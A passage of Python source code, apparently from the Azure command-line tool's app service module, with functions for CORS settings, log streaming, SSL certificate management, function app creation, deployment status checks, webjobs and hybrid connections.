if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version][runtime]
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions_version {}. Supported versions are: {}'
.format(runtime_version, runtime, functions_version, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version]:
raise CLIError("An appropriate linux image for runtime:'{}', "
"functions_version: '{}' was not found".format(runtime, functions_version))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(functions_version, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(functions_version,
runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_linux_fx_functionapp(functions_version, runtime, runtime_version):
if runtime == 'dotnet':
return runtime.upper()
if runtime_version is None:
runtime_version = FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION[functions_version][runtime]
return '{}|{}'.format(runtime.upper(), runtime_version)
def _get_website_node_version_functionapp(functions_version, runtime, runtime_version):
if runtime is None or runtime != 'node':
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
if runtime_version is not None:
return '~{}'.format(runtime_version)
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
